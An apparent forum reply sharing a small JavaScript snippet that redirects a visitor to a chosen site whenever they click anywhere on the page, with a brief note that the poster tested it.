Put this between your <head> </head> tags
Quote:
<script type="text/javascript">
window.onclick = function() {
setTimeout("window.location.href= 'http://the.redirect.site/'",0);
}
</script>
|
The "redirect site" being where you want to send them
I just tested it on a page that had an image but no links or urls.